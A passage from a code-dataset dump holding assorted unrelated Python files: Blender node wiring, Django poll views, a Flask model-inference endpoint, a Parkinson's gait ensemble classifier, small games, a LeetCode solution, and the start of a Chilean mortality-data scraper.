self.newLink(animationOffsetGroupInputNode.outputs[0], invokeObjectLoopNode.inputs[1])\n self.newLink(animationOffsetGroupInputNode.outputs[1], invokeObjectLoopNode.inputs[0])\n self.newLink(animationOffsetGroupInputNode.outputs[2], invokeObjectLoopNode.inputs[3])\n self.newLink(animationOffsetGroupInputNode.outputs[3], invokeObjectLoopNode.inputs[4])\n self.newLink(animationOffsetGroupInputNode.outputs[4], invokeObjectLoopNode.inputs[5])\n self.newLink(animationOffsetGroupInputNode.outputs[5], invokeObjectLoopNode.inputs[6])\n self.newLink(fCurvesFromObjectNode.outputs[0], invokeObjectLoopNode.inputs[2])\n self.newLink(invokeObjectLoopNode.outputs[0], animationOffsetGroupOutputNode.inputs[0])\n\n # Object Loop\n\n self.newLink(objectLoopInputNode.outputs[0], multiplyIndexAndOffsetNode.inputs[0])\n self.newLink(objectLoopInputNode.outputs[2], copyTransformsNode.inputs[1])\n self.newLink(objectLoopInputNode.outputs[4], copyTransformsNode.inputs[0])\n self.newLink(objectLoopInputNode.outputs[5], invokeCopyFCurvesNode.inputs[0])\n self.newLink(objectLoopInputNode.outputs[6], subtractOffsetFromFrameNode.inputs[0])\n self.newLink(objectLoopInputNode.outputs[7], multiplyIndexAndOffsetNode.inputs[1])\n self.newLink(objectLoopInputNode.outputs[8], additionalTransformNode.inputs[1])\n self.newLink(objectLoopInputNode.outputs[9], calculateAccumulatedMatrixNode.inputs[0])\n self.newLink(objectLoopInputNode.outputs[10], calculateAccumulatedMatrixNode.inputs[1])\n self.newLink(objectLoopInputNode.outputs[10], localTransformNode.inputs[1])\n self.newLink(multiplyIndexAndOffsetNode.outputs[0], subtractOffsetFromFrameNode.inputs[1])\n self.newLink(subtractOffsetFromFrameNode.outputs[0], invokeCopyFCurvesNode.inputs[2])\n self.newLink(calculateAccumulatedMatrixNode.outputs[0], reassignAccumulatedMatrixNode.inputs[0])\n self.newLink(copyTransformsNode.outputs[0], invokeCopyFCurvesNode.inputs[1])\n self.newLink(invokeCopyFCurvesNode.outputs[0], updateMatrixNode.inputs[0])\n self.newLink(updateMatrixNode.outputs[0], localTransformNode.inputs[0])\n self.newLink(localTransformNode.outputs[0], additionalTransformNode.inputs[0])\n\n # Copy FCurves Loop\n\n self.newLink(copyFCurvesLoopInput.outputs[2], evaluateFCurveNode.inputs[0])\n self.newLink(copyFCurvesLoopInput.outputs[2], fCurveInfoNode.inputs[0])\n self.newLink(copyFCurvesLoopInput.outputs[4], objectDataPathOutputNode.inputs[0])\n self.newLink(copyFCurvesLoopInput.outputs[5], evaluateFCurveNode.inputs[1])\n self.newLink(fCurveInfoNode.outputs[0], objectDataPathOutputNode.inputs[1])\n self.newLink(fCurveInfoNode.outputs[1], objectDataPathOutputNode.inputs[2])\n self.newLink(evaluateFCurveNode.outputs[0], objectDataPathOutputNode.inputs[3])\n","repo_name":"chrisatbest/animation_nodes","sub_path":"templates/animation/fcurve_animation_offset.py","file_name":"fcurve_animation_offset.py","file_ext":"py","file_size_in_byte":9409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"72666529211","text":"\r\noptions=int(input(\"Enter 1.Money Withdraw 2.Money depoit: \"))\r\ntotal_amount=0\r\nwhile options==1:\r\n pin=int(input(\"please enter the pin number: \"))\r\n if pin==1234:\r\n amount=int(input(\"enter the amount you want to deposit: \"))\r\n total_amount+=amount\r\n print(total_amount)\r\n elif(pin==123):\r\n amount=int(input(\"Enter the amonut you want to withdraw: \"))\r\n total_amount-=amount\r\n print(total_amount)\r\n\r\n\r\n","repo_name":"Bhavin6500/python-code","sub_path":"dict tuple list.py","file_name":"dict tuple list.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74006106172","text":"import torch\nimport numpy as np\nimport argparse\nimport utils\nimport yaml\n\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification, TrainingArguments, Trainer, EvalPrediction\nfrom sklearn.metrics import f1_score, accuracy_score\nfrom datasets import load_dataset\n\nparser = argparse.ArgumentParser(description=\"path to test_data.csv\")\nparser.add_argument(\"-p\", \"--path\", help=\"Path\")\nargs = parser.parse_args()\n\ndef load_config(config_path):\n with open(config_path) as file:\n config = yaml.safe_load(file)\n\n return config\n\n\nconfig = load_config(\"./train_config.yaml\")\n\ndataset = load_dataset('csv', data_files={'test': args.path})\n\ntokenizer = AutoTokenizer.from_pretrained(config[\"model_save_path\"])\n\n\ndef preprocess_data(examples):\n text = examples[\"transcription\"]\n encoding = tokenizer(text, padding=\"max_length\", truncation=True, max_length=config[\"max_length\"])\n action = examples[\"action\"]\n obj = examples[\"object\"]\n location = examples[\"location\"]\n labels_matrix = np.zeros((len(text), len(config[\"labels\"])))\n for index, i, j, k in zip(range(len(text)), action, obj, location):\n for i in utils.get_id(i, j, k, config):\n labels_matrix[index][i] = 1\n\n encoding[\"labels\"] = labels_matrix.tolist()\n\n return encoding\n\n\nencoded_dataset = dataset.map(preprocess_data, batched=True, remove_columns=dataset['test'].column_names)\nencoded_dataset.set_format(\"torch\")\n\nmodel = AutoModelForSequenceClassification.from_pretrained(config[\"model_save_path\"],\n problem_type=config[\"problem_type\"],\n num_labels=len(config[\"labels\"]),\n id2label=config[\"id2label\"],\n label2id=config[\"label2id\"])\n\nargs = TrainingArguments(\n output_dir=config[\"model_save_path\"],\n evaluation_strategy=\"epoch\",\n save_strategy=\"epoch\",\n learning_rate=2e-5,\n per_device_train_batch_size=16,\n per_device_eval_batch_size=config[\"test_batch_size\"],\n num_train_epochs=config[\"num_train_epochs\"],\n weight_decay=config[\"weight_decay\"],\n metric_for_best_model=config[\"metric\"],\n)\n\n\ndef multi_label_metrics(predictions, labels):\n sigmoid = torch.nn.Sigmoid()\n probs = sigmoid(torch.Tensor(predictions))\n y_pred = []\n for prob in probs:\n y_pred_sample = np.zeros(prob.shape)\n for i in utils.get_out_labels(prob):\n y_pred_sample[i] = 1\n y_pred.append(y_pred_sample.tolist())\n y_true = labels\n f1_micro_average = f1_score(y_true=y_true, y_pred=y_pred, average='micro')\n accuracy = accuracy_score(y_true, y_pred)\n metrics = {'f1': f1_micro_average,\n 'accuracy': accuracy}\n return metrics\n\ndef compute_metrics(p: EvalPrediction):\n preds = p.predictions[0] if isinstance(p.predictions,\n tuple) else p.predictions\n print(f\"len of preds = {len(preds)}\")\n result = multi_label_metrics(\n predictions=preds,\n labels=p.label_ids)\n return result\n\ntrainer = Trainer(\n model,\n args,\n eval_dataset=encoded_dataset[\"test\"],\n tokenizer=tokenizer,\n compute_metrics=compute_metrics\n)\n\nprint(trainer.evaluate())","repo_name":"dineshggaonkar/LabelExtraction","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18908165313","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom .models import Question, Choice\nfrom django.urls import reverse\nfrom django.template import loader\nfrom django.shortcuts import render, get_object_or_404\nfrom django.views import generic # 从数据库中取数据前台渲染列表的操作比较简单,重复,Django封装了一个过程并提供统一的模板\nfrom django.http import Http404\n\n# Create your views here.\n\n\n# def index(request):\n# \"\"\"\n# 展示问题列表\n# :param request:\n# :return:\n# \"\"\"\n# question_list = Question.objects.all().order_by('-pub_date')[0:5]\n# # print(question_list)\n# # output = ''\n# # for q in question_list:\n# # print(q.id, q.question_text, q.pub_date)\n# # output = output + q.question_text + ','\n# # print(output)\n# # 下面一行列表生成式代替上面四五行\n# # output = ','.join([q.question_text for q in question_list])\n# template = loader.get_template('polls/index.html')\n# context = {\n# 'question_list': question_list\n# }\n# return HttpResponse(template.render(context, request))\n\n\ndef index(request):\n question_list = Question.objects.order_by('-pub_date')[:5]\n context = {\n 'question_list': question_list\n }\n return render(request, 'polls/index.html', context)\n\n\ndef detail(request, question_id):\n \"\"\"\n 显示一个问题的详细信息,问题内容,问题发布时间,选项内容,每个选项投票数\n :param request:\n :param question_id:\n :return:\n \"\"\"\n \"\"\"\n # 写法一\n try:\n question = Question.objects.filter(id=question_id)\n except Question.DoesNotExist:\n raise Http404(\"404,此id的问题不存在\")\n print(question)\n context = {\n 'question': question\n }\n # 写法二\n # question = Question.objects.filter(id=question_id)\n # if not question:\n # raise Http404()\n return render(request, 'polls/detail.html', context)\n \"\"\"\n\n # 写法三\n question = get_object_or_404(Question, id=question_id)\n # 由于orm代劳,question直接带出对应的choices\n # choices = question.choice_set.all()\n # 由于前端模板语言本质是后端代码,可以把上一句放在html中写,有助于降低后端复杂度\n # choices = Choice.objects.filter(question_id=question.id)\n context = {\n 'question': question\n }\n return render(request, 'polls/detail.html', context)\n\n\ndef results(request, question_id):\n \"\"\"\n 投票结果\n :param request:\n :param question_id:\n :return:\n \"\"\"\n question = Question.objects.get(id=question_id)\n context = {\n 'question': question,\n }\n\n return render(request, 'polls/results.html', context)\n\n\ndef vote(request, question_id):\n \"\"\"\n 投票\n :param request:\n :param question_id:\n :return:\n \"\"\"\n try:\n question = Question.objects.get(id=question_id)\n choices = question.choice_set.all()\n choice_id = request.POST['choice']\n selected_choice = question.choice_set.get(id=choice_id)\n except Question.DoesNotExist as e:\n error_message = '问题内容不存在,请检查问题id'\n except Choice.DoesNotExist as e:\n error_message = '问题对应的选项不存在'\n return render(request, 'polls/detail.html', context={\n 'question': question,\n 'error_message': error_message\n })\n else:\n # sql update choice set votes=votes+1 where id=2\n selected_choice.votes += 1\n selected_choice.save()\n # 投票完重定向到 views.results(qid)\n return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))\n\n\n# 通用模板示例,跟def index 类比着看,比较适合单调的增删查改\nclass SimpleView(generic.ListView):\n template_name = 'polls/index.html '\n context_object_name = 'question_list'\n\n def get_queryset(self):\n return Question.objects.all()\n\n\n\n\n","repo_name":"qiaoqiao520/mysite","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"33525625313","text":"from django.conf.urls import patterns, url, include\nfrom task_list import views\n\nurlpatterns = patterns(\"\",\n url(r\"^/?$\", views.task_list, name=\"task_list\"),\n url(r\"^register/$\", views.register_user, name=\"register_user\"),\n url(r\"^login/$\", views.login_user, name=\"login_user\"),\n url(r\"^logout/$\", views.logout_user, name=\"logout_user\"),\n url(r\"^about/$\", views.about, name=\"about\"),\n url(r\"^close_task/(\\d+)$\", views.close_task, name=\"close_task\"),\n url(r\"^add_task/$\", views.add_task, name=\"add_task\"),\n url(r\"^edit_task/(\\d+)$\", views.edit_task, name=\"edit_task\"),\n url(r\"^delete_task/(\\d+)$\", views.delete_task, name=\"delete_task\"),\n)\n","repo_name":"nakhan98/Task-List","sub_path":"src/task_list/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43597881084","text":"from flask import Flask,jsonify, request\nfrom inference import inference\nimport flask\nimport os\nimport flask_cors\n\n\napp = Flask(__name__)\nflask_cors.CORS(app=app)\napp.config['MAX_CONTENT_LENGTH'] = 10 * 1024 * 1024\n\n@app.route('/inference', methods=['POST'])\ndef predict():\n content = request.files['image']\n content.save(content.filename)\n label, prob = inference(os.path.join(\"./\", content.filename))\n os.remove(content.filename)\n return jsonify(result=label, probability=prob)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8081, threaded = True)\n\n","repo_name":"vmyanaACR/mask_detector","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24290322689","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 8 20:36:19 2020\n\n@author: sandra\n\"\"\"\n\nimport itertools\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib.collections import LineCollection\nimport numpy as np\n\nimport cartopy.feature\nfrom cartopy.mpl.patch import geos_to_path\nimport cartopy.crs as ccrs\n\n\nfig = plt.figure()\nax = Axes3D(fig, xlim=[-180, 180], ylim=[-90, 90])\nax.set_zlim(bottom=0)\n\n\ntarget_projection = ccrs.PlateCarree()\n\nfeature = cartopy.feature.NaturalEarthFeature('physical', 'land', '110m')\ngeoms = feature.geometries()\n\ngeoms = [target_projection.project_geometry(geom, feature.crs)\n for geom in geoms]\n\npaths = list(itertools.chain.from_iterable(geos_to_path(geom) for geom in geoms))\n\n# At this point, we start working around mpl3d's slightly broken interfaces.\n# So we produce a LineCollection rather than a PathCollection.\nsegments = []\nfor path in paths:\n vertices = [vertex for vertex, _ in path.iter_segments()]\n vertices = np.asarray(vertices)\n segments.append(vertices)\n\nlc = LineCollection(segments, color='black')\n\nax.add_collection3d(lc)\n\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Height')\n\nplt.show()","repo_name":"sandraaaaa96/folium-maps","sub_path":"ruffduff/3D_basemap_mpl.py","file_name":"3D_basemap_mpl.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27257360478","text":"from copy import deepcopy\n\n\ndef bunny_multiplication_func(play_field_copy, bunny, player_is_alive):\n for x, y in directions.values():\n new_bunny_row, new_bunny_column = bunny[0] + x, bunny[1] + y\n if (0 <= new_bunny_row < number_of_rows) and (0 <= new_bunny_column < number_of_columns):\n if play_field_copy[new_bunny_row][new_bunny_column] == \"P\":\n player_is_alive = False\n play_field_copy[new_bunny_row][new_bunny_column] = \"B\"\n\n return play_field_copy, player_is_alive\n\n\ndef bunnies_turn_func(play_field, player_status):\n player_is_alive = player_status\n play_field_copy = deepcopy(play_field)\n\n for r in range(number_of_rows):\n for c in range(number_of_columns):\n if play_field[r][c] == \"B\":\n bunny = [r, c]\n play_field_copy, player_is_alive = bunny_multiplication_func(play_field_copy, bunny, player_is_alive)\n play_field = play_field_copy\n return play_field, player_is_alive\n\n\ndef player_turn_func(play_field, player, movement):\n player_is_alive = True\n player_escapes = False\n new_row, new_column = player[0] + movement[0], player[1] + movement[1]\n if not (0 <= new_row < number_of_rows) or not (0 <= new_column < number_of_columns):\n play_field[player[0]][player[1]] = \".\"\n player_escapes = True\n elif play_field[new_row][new_column] == \"B\":\n player_is_alive = False\n play_field[player[0]][player[1]] = \".\"\n player = [new_row, new_column]\n else:\n play_field[player[0]][player[1]] = \".\"\n player = [new_row, new_column]\n play_field[player[0]][player[1]] = \"P\"\n\n return play_field, player, player_is_alive, player_escapes\n\n\nnumber_of_rows, number_of_columns = map(int, input().split())\n\nbunny_lair = list()\nplayer_position = list()\nplayer_alive = True\nplayer_wins = False\n\nfor row in range(number_of_rows):\n current_row = list(input())\n if \"P\" in current_row:\n player_position = [row, current_row.index(\"P\")]\n bunny_lair.append(current_row)\n\nmove_commands = list(input())\n\ndirections = {\n \"U\": (-1, 0),\n \"D\": (1, 0),\n \"L\": (0, -1),\n \"R\": (0, 1)\n}\n\nfor move in move_commands:\n if player_wins:\n break\n if not player_alive:\n break\n bunny_lair, player_position, player_alive, player_wins = \\\n player_turn_func(bunny_lair, player_position, directions[move])\n bunny_lair, player_alive = bunnies_turn_func(bunny_lair, player_alive)\n\n\nfor row in range(number_of_rows):\n print(*bunny_lair[row], sep=\"\")\n\nif player_wins:\n print(f\"won: {player_position[0]} {player_position[1]}\")\nelse:\n print(f\"dead: {player_position[0]} {player_position[1]}\")\n","repo_name":"Moramarth/SoftUni-Python-Advanced-january-2023","sub_path":"multidimensional_lists/first_exercise_10_radioactive_mutant_vampire_bunnies.py","file_name":"first_exercise_10_radioactive_mutant_vampire_bunnies.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12891340158","text":"from functools import lru_cache\n\n\nclass Solution:\n def minimumOneBitOperations(self, n: int) -> int:\n ans = 0\n for i, ch in enumerate(reversed(bin(n)), 1):\n if ch == '1':\n ans = 2 ** i - ans - 1\n return ans\n\n\nclass Solution1:\n def minimumOneBitOperations(self, n: int) -> int:\n ans = unset = 0\n for ch in reversed(bin(n)):\n unset = unset * 2 + 1\n if ch == '1':\n ans = unset - ans\n return ans\n\n\nclass Solution2:\n def minimumOneBitOperations(self, n: int) -> int:\n ans, i = 0, 0\n unset = 1\n while n:\n if n % 2:\n ans = unset - ans\n unset = unset * 2 + 1\n n //= 2\n i += 1\n return ans\n\n\nclass Solution3:\n def minimumOneBitOperations(self, n: int) -> int:\n if not n:\n return 0\n\n @lru_cache(None)\n def unset_bit(i) -> int:\n \"\"\" 1...0100...0 -> 1...0110...0 -> 1...0010...0 \"\"\"\n if not i:\n return 1\n return set_bit(i - 1) + unset_bit(i - 1) + 1\n\n @lru_cache(None)\n def set_bit(i) -> int:\n \"\"\" 1...0000...0 -> 1...0010...0 -> 1...0110...0 -> 1...0100...0 \"\"\"\n if not i:\n return 1\n return set_bit(i - 1) + unset_bit(i - 1) + 1\n\n pos = [i for i, ch in enumerate(reversed(bin(n))) if ch == '1']\n\n ans = 0\n for p in pos:\n ans = unset_bit(p) - ans\n return ans\n\n\ndef test():\n sol = Solution()\n\n print('Test 1... ', end='')\n assert sol.minimumOneBitOperations(n=3) == 2\n print('OK')\n\n print('Test 2... ', end='')\n assert sol.minimumOneBitOperations(n=6) == 4\n print('OK')\n\n\nif __name__ == '__main__':\n test()\n","repo_name":"Vskesha/leetcode_solutions","sub_path":"leetcode_solutions/p1611_minimum_one_bit_operations_to_make_integers_zero.py","file_name":"p1611_minimum_one_bit_operations_to_make_integers_zero.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"27856808084","text":"# https://programmers.co.kr/learn/courses/30/lessons/81301\n\n# 처음에 시도했던 코드 처음에 아무생각도 안나서 그냥 때려넣은 코드\n# def solution(s): # 무지성 코드\n# s = s.replace(\"one\", \"1\").replace(\"two\", \"2\").replace(\n# \"three\", \"3\").replace(\"four\", \"4\").replace(\"five\", \"5\").replace(\"six\", \"6\").replace(\"seven\", \"7\").replace(\"eight\", \"8\").replace(\"nine\", \"9\").replace(\"zero\", \"0\")\n# answer = int(s)\n# return answer\n\ndef solution(s):\n num_dict = {\"one\": \"1\", \"two\": \"2\", \"three\": \"3\", \"four\": \"4\", \"five\": \"5\",\n \"six\": \"6\", \"seven\": \"7\", \"eight\": \"8\", \"nine\": \"9\", \"zero\": \"0\"}\n # 변환할 값들을 딕셔너리에 넣고 반복문으로 처리함\n for key in num_dict.keys():\n s = s.replace(key, num_dict[key])\n answer = int(s)\n return answer\n","repo_name":"thecode00/Algorithm-Problem-Solve","sub_path":"Programmers/Python/Level 1/숫자 문자열과 영단어/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17809510260","text":"import random\n\n\nclass Character:\n def __init__(self,strength, dexterity, constitution, intelligence, wisdom, charisma):\n self.strength=strength\n self.dexterity=dexterity\n self.constitution=constitution\n self.intelligence=intelligence\n self.wisdom=wisdom\n self.charisma=charisma\n self.hitpoint=self.constitution*30+50\n\n def show_stats(self):\n print(\"strength\",self.strength)\n print(\"dexterity\",self.dexterity)\n print(\"constitution\",self.constitution)\n print(\"intelligence\",self.intelligence)\n print(\"wisdom\",self.wisdom)\n print(\"charisma\",self.charisma)\n \n def show_hitpoints(self):\n print(\"hitpoint\",self.hitpoint)\n\n def attack(self):\n return random.randint(1,self.strength)\n \n def defence(self,defen):\n a=random.randint(0,20)\n if(a>=self.dexterity):\n defen=defen-self.attack\n \n def heal(self,healValue):\n self.hitpoint+=healValue\n\nif __name__ == \"__main__\":\n characterA=Character(6,7,8,9,10,11)\n characterA.show_hitpoints()\n characterA.heal(10)\n characterA.show_hitpoints()\n characterA.show_stats()\n characterA.defence(15)\n characterA.show_stats()\n \n\n\n\n\n ","repo_name":"tgtbayern/intro","sub_path":"7forClass.py","file_name":"7forClass.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26674270698","text":"if __name__ == \"__main__\":\n quit()\n\nfrom tools import *\nimport framework\nimport state_title\nimport state_lobby\nimport sound\n\nimport object\nimport gui\nimport gmap\nimport tank\nimport shell\nimport sprite\nimport ending\nimport environment as env\nimport supply\nimport inventory\n\n_is_game_over = False\n_winner = 0\n_is_edit_mode = False\n\nSCENE_STATES = ( \"Control\", \"Fire\", \"Supply\", \"Ending\" )\nmap_index = 0\n\ndef enter():\n from state_lobby import get_mode, get_difficulty\n mode = get_mode()\n\n global scene_state\n scene_state = SCENE_STATES[0]\n \n global map_index\n map_index = state_lobby.crnt_map_index + 1\n\n object.enter()\n gmap.enter()\n shell.enter()\n gui.enter()\n tank.enter()\n sprite.enter()\n env.enter(map_index)\n ending.enter()\n sound.enter('battle')\n supply.enter()\n inventory.enter()\n\n #map_index = -4\n gmap.read_mapfile(map_index, mode)\n tank.apply_difficulty(get_difficulty())\n\n global _is_game_over\n _is_game_over = False\n \n global _is_edit_mode\n if map_index > 0:\n sound.play_battle_bgm(map_index)\n _is_edit_mode = False\n else:\n _is_edit_mode = True\n\n\ndef exit():\n inventory.exit()\n env.exit()\n sprite.exit()\n shell.exit()\n tank.exit()\n gui.exit()\n object.exit()\n ending.exit()\n gmap.exit()\n sound.exit()\n supply.exit()\n\ndef update():\n global _is_game_over, _winner\n\n object.update()\n sprite.update()\n gui.update()\n tank.update()\n\n if _is_edit_mode:\n return\n if scene_state == \"Ending\":\n if _is_game_over == False:\n if _winner == 0:\n sound.play_bgm('win')\n elif _winner == -1:\n sound.play_bgm('lose')\n else:\n assert(0)\n\n _is_game_over = True\n if ending.update() == False:\n framework.change_state(state_title)\n\ndef draw():\n\n gmap.draw()\n gui.draw()\n inventory.draw()\n object.draw()\n sprite.draw()\n gmap.draw_debugs()\n\n if _is_game_over:\n ending.draw(_winner)\n \n update_canvas()\n\ndef handle_events(events=None):\n if events == None:\n events = get_events()\n event : Event\n\n if gmap.is_draw_mode == True:\n gmap.handle_draw_mode_events(events)\n return\n\n for event in events:\n if event.type == SDL_QUIT:\n framework.change_state(state_title)\n return\n\n tank.handle_event(event)\n\n if event.type == SDL_KEYDOWN:\n if event.key == SDLK_F1:\n gmap.start_draw_mode()\n\ndef pause():\n pass\ndef resume():\n pass\n\n\ndef set_state(state : str):\n assert(state in SCENE_STATES)\n\n global scene_state\n scene_state = state\n\ndef set_winner(winner):\n global _winner\n _winner = winner\n\ndef get_gravity():\n gravity = 9.8\n if map_index == 4:\n return gravity * 0.7\n return gravity","repo_name":"SaintPingu/2DGP-Project","sub_path":"state_battle.py","file_name":"state_battle.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15897829351","text":"import os\nimport pandas as pd\nimport csv\nimport numpy as np\nimport warnings\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier,GradientBoostingClassifier,AdaBoostClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\n# Train two Random Forest models\nwarnings.filterwarnings('ignore') \n\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\n# Load and prepare the datasets\ndata = pd.read_csv(\"../dataset_tl/Parkinson_CV.tab\", delimiter=\"\\t\")\nprint(data)\n\n\n# Filter the last column as the label\nlabel = data.iloc[:, -1]\n\nlabel = label.replace({'Co': 0, 'Pt': 1})\n\n# Remove the last column from the datasets\ndata = data.iloc[:, :-1]\n\n# Split the data into training and testing sets\nX_train, X_test, y_train, y_test = train_test_split(data, label, test_size=0.2, random_state=42)\n\n\n#Ensemble model\n# Instantiate the models\nrf_model = RandomForestClassifier(n_estimators=100, random_state=42)\ngb_model = GradientBoostingClassifier(n_estimators=100, random_state=42)\nada_model = AdaBoostClassifier(n_estimators=100, random_state=42)\n\n# Train the models\nrf_model.fit(X_train, y_train)\ngb_model.fit(X_train, y_train)\nada_model.fit(X_train, y_train)\n\n# Make predictions on the test set\nrf_pred = rf_model.predict(X_test)\ngb_pred = gb_model.predict(X_test)\nada_pred = ada_model.predict(X_test)\n\n# Combine the predictions using a simple majority vote\nensemble_pred = np.round((rf_pred + gb_pred + ada_pred) / 3)\n\n# Evaluate the ensemble's accuracy\nensemble_acc = accuracy_score(y_test, ensemble_pred)\nprint(\"Ensemble accuracy:\", ensemble_acc)\n\n#transfer learning\nprint('***** Transfer Learning ***')\n\ntest = pd.read_csv(\"../dataset_tl/Parkinson_CV_dataset2_transformed.tab\", delimiter=\"\\t\")\n\n# Filter the last column as the label\nlabel = test.iloc[:, -1]\n\nlabel = label.replace({'Co': 0, 'Pt': 1})\n# Remove the last column from the datasets\ntest = test.iloc[:, :-1]\n# Make predictions on the test set\nrf_pred = rf_model.predict(test)\ngb_pred = gb_model.predict(test)\nada_pred = ada_model.predict(test)\n\n# Combine the predictions using a simple majority vote\nensemble_pred = np.round((rf_pred + gb_pred + ada_pred) / 3)\n\n# Evaluate the ensemble's accuracy\nensemble_acc = accuracy_score(label, ensemble_pred)\nprint(\"Ensemble accuracy:\", ensemble_acc)\n","repo_name":"SwagarikaGiri/Parkinson-detection-from-gait","sub_path":"codes_2/transfer_learning.py","file_name":"transfer_learning.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21628944292","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport io\nimport json\nimport uuid\nimport time\nimport py7zr\nimport base64\nimport chardet\nimport requests\nimport warnings\nimport urllib3\nimport datetime\nimport unidecode\nimport traceback\nimport itertools\n\nimport perkins\nimport perkins.requests\nimport perkins.input.powerbi\n\nfrom bs4 import BeautifulSoup\nfrom zipfile import ZipFile\n\nimport pandas as pd\nimport numpy as np\n\nwarnings.filterwarnings('ignore', category=urllib3.exceptions.InsecureRequestWarning)\nwarnings.filterwarnings('ignore', category=FutureWarning)\nwarnings.filterwarnings('ignore', category=UserWarning)\nwarnings.filterwarnings('ignore', category=pd.errors.PerformanceWarning)\n\n\ndef get_iso3166(adm1_df, iso):\n global iso_geo_names, geo_names\n\n adm1_index = map(lambda _: unidecode.unidecode(_.lower()), adm1_df)\n adm1_index = list(adm1_index)\n\n country_geo_names = geo_names[geo_names['geocode'].str.startswith(iso)]\n country_geo_names = country_geo_names[\n ~country_geo_names.index.duplicated(keep='first')\n ]\n\n adm1_index = country_geo_names.loc[adm1_index]\n\n adm1_index['name'] = iso_geo_names.loc[\n adm1_index['geocode'].values\n ][0].values\n adm1_index.index = adm1_df\n\n return adm1_index\n\n\ndef get_population():\n geo_sa_df = pd.read_csv('./update/south.america.population.csv')\n geo_sa_df_ = geo_sa_df.groupby([\n 'name_0', 'name_1', 'name_2'\n ])['population'].sum()\n\n # All adm level 2 with population over 100k or biggest for each adm level 1\n sa_cities = pd.DataFrame([\n *geo_sa_df_[geo_sa_df_ > 1e5].index.to_list(),\n *geo_sa_df_.groupby(level=['name_0', 'name_1']).idxmax().values\n ]).drop_duplicates()\n\n sa_cities.columns = ['name_0', 'name_1', 'name_2']\n sa_cities = sa_cities.sort_values(['name_0', 'name_1', 'name_2'])\n\n geo_sa_df = geo_sa_df.set_index(['name_0', 'name_1', 'name_2', 'name_3'])\n\n return geo_sa_df, sa_cities\n\n\nARTICLES = ['de', 'del', 'los', 'las']\ndef do_title(title):\n try:\n title = title.encode('cp1252').decode('utf-8')\n except:\n pass\n\n title = title.lower().capitalize().split(' ')\n title = title[:1] + [\n _.capitalize() if _ not in ARTICLES else _ for _ in title[1:]\n ]\n\n return ' '.join(title)\n\n\nDF_ADM1_COLS = [\n 'iso_code', 'country_name', 'adm1_isocode',\n 'adm1_name', 'frequency', 'date', 'deaths'\n]\nDF_ADM2_COLS = [\n 'iso_code', 'country_name', 'adm1_isocode',\n 'adm1_name', 'adm2_name', 'frequency',\n 'date', 'deaths'\n]\n\ndef storage_format(df, iso_code=None, **kwargs):\n df = df.reset_index()\n df['iso_code'] = iso_code\n\n for k, v in kwargs.items():\n df[k] = v\n\n adm1_df = df['adm1_name'].unique()\n adm1_df = get_iso3166(adm1_df, iso_code)\n\n df['adm1_isocode'] = df['adm1_name']\n df['adm1_isocode'] = df['adm1_isocode'].map(\n adm1_df['geocode'].to_dict()\n )\n\n df['adm1_name'] = df['adm1_name'].map(\n adm1_df['name'].to_dict()\n )\n\n df['deaths'] = df['deaths'].astype(int)\n\n return df\n\n\nCHILE_BASE_URL = 'https://deis.minsal.cl/wp-admin/admin-ajax.php'\nCHILE_INDEX_PARAMS = {\n 'action': 'wp_ajax_ninja_tables_public_action',\n 'table_id': '2889',\n 'target_action': 'get-all-data',\n 'default_sorting': 'manual_sort',\n}\nCHL_ADM1_MAP = {\n 'Metropolitana de Santiago': 'Santiago Metropolitan',\n 'La Araucanía': 'Araucania',\n \"Libertador B. O'Higgins\": \"O'Higgins\",\n 'Magallanes y de La Antártica Chilena': 'Magallanes',\n 'Aisén del Gral. C. Ibáñez del Campo': 'Aisen'\n}\ndef update_chile():\n req = requests.get(\n CHILE_BASE_URL,\n params=CHILE_INDEX_PARAMS,\n headers=perkins.DEFAULT_HEADERS\n )\n 